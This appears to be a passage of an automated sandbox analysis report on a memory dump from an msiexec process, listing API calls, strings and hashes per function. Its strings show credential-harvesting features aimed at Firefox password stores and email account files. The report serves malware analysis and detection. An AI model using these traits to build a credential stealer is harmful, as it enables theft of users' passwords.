                                                              • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                              • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              APIs
                                                              • memset.MSVCRT ref: 004076D7
                                                              • sprintf.MSVCRT ref: 00407704
                                                              • strlen.MSVCRT ref: 00407710
                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                              • strlen.MSVCRT ref: 00407733
                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$memsetsprintf
                                                              • String ID: %s (%s)
                                                              • API String ID: 3756086014-1363028141
                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                              • String ID: pwg
                                                              • API String ID: 1189762176-867261680
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              APIs
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 82305771-620537770
                                                              • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              APIs
                                                              • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                              Strings
                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                              • no such savepoint: %s, xrefs: 00426A02
                                                              • unknown error, xrefs: 004277B2
                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                              • API String ID: 3510742995-3035234601
                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-3608744896
                                                              • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                              • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                              • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                              • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                              APIs
                                                              • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                              • API String ID: 1784268899-4153596280
                                                              • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                              • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                              • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                              • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              APIs
                                                              • memset.MSVCRT ref: 00403A88
                                                              • memset.MSVCRT ref: 00403AA1
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                              • strlen.MSVCRT ref: 00403AE9
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                              • String ID:
                                                              • API String ID: 1786725549-0
                                                              • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                              • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                              • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                              • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                              APIs
                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              APIs
                                                              • memset.MSVCRT ref: 0044495F
                                                              • memset.MSVCRT ref: 00444978
                                                              • memset.MSVCRT ref: 0044498C
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 004449A8
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                              • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen
                                                              • String ID:
                                                              • API String ID: 2142929671-0
                                                              • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
